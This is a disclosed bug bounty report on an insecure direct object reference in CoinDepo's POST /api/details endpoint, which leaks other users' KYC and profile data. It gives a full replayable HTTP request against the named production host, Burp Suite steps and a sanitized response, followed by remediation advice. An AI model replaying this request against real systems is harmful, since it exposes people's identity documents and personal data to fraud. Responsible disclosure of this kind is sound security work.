Status DataClose notification

CoinDepo Disclosed Report

IDOR/BFLA in POST /api/details exposes full KYC & profile data of arbitrary users

Company
Created date
Aug 15 2025

Target

hidden

Vulnerability Details

Hi Team,

I hope you are good in the other side of your screen,

Description:

The POST /api/details endpoint accepts a user‑supplied email (and other identifiers) and returns the full profile/KYC record without verifying that the requester owns that email/account. By changing the email field to another user’s address, an attacker can retrieve sensitive PII and KYC metadata for that user.

Impact:

  • Sensitive information disclosure: full name, DOB, phone, address, country, language, user_id, registration data, referral codes, and document file paths.
  • Facilitates account takeover & fraud: disclosed data aids phishing, credential recovery attacks, and social engineering; KYC doc paths may be abused for further exploitation if direct access is possible.
  • On a financial platform, this materially increases risk of unauthorized fund transfers when combined with other issues.

Validation steps

**POC Video is Available **

  1. Authenticate with any valid account.
  2. Intercept the request from Email Verification flow and send the following to Repeater: Or Copy below Request and send to Burpsuite repeater, and just put a valid client_token of any user they try this Successfull attack.

POST /api/details HTTP/2
Host: app.coindepo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://app.coindepo.com/profile/verification/email-verification
Content-Type: multipart/form-data; boundary=---------------------------189560883331716172202924004220
Content-Length: 803
Origin: https://app.coindepo.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: blue
Te: trailers


-----------------------------189560883331716172202924004220
Content-Disposition: form-data; name="id"

ID
-----------------------------189560883331716172202924004220
Content-Disposition: form-data; name="username"

[email protected]
-----------------------------189560883331716172202924004220
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------189560883331716172202924004220
Content-Disposition: form-data; name="client_token"

Valid ID Token Of Any user                                                                   -----------------------------> Important
-----------------------------189560883331716172202924004220
Content-Disposition: form-data; name="cdkey"

307d9f4d-5b9f-425c-bc3e-477846df51f0
-----------------------------189560883331716172202924004220--

  1. Send the request.

  2. Observe 200 OK with JSON containing the victim’s PII and KYC fields (e.g., first_name, last_name, date_of_birth, phone, address1, document_type, document_photo1, document_photo2, notification flags, etc.).

Evidence (sanitized) Response (excerpt):

{
  "user_id": 19063,
  "status": "checking",
  "email": "[email protected]",
  "first_name": "...",
  "last_name": "...",
  "date_of_birth": "YYYY-MM-DD",
  "phone": "+...",

  "address1": "...",
  "city": "...",
  "state": "...",
  "zip": "...",
  "document_type": "id-card",
  "document_photo1": "./uploads/<...>_document_photo1.jpg",
  "document_photo2": "./uploads/<...>_document_photo2.jpg",
  "email_trx": "1",
  "email_system": "1",
  ...
}


Recommended Remediation

  • Do not trust client‑supplied email, user_id, or similar selectors for authorization.
  • Identify the target account solely from the authenticated session/token (e.g., sub/user_id claim).
  • Enforce ownership checks server‑side before returning any profile/KYC data.
  • Remove PII fields that aren’t strictly required by the client; return only minimally necessary data.
  • Rotate/limit access to any exposed document URLs; serve via short‑lived signed URLs with per‑user ACLs.
  • Add unit/integration tests for IDOR/H-BFLA on all account/identity endpoints.

If you have any question feel free to reach out, i am happy to provide additional Information

Thank you for giving time on this submission

Best_regards, M1S0

Attachments

hidden
CommentsReport History
Comments on this report are hidden
Details
Statedisclosed
Severity
Critical
Bounty$5,289
Visibilitypartially
VulnerabilityInsecure Direct Object Reference (IDOR)
Participants
hidden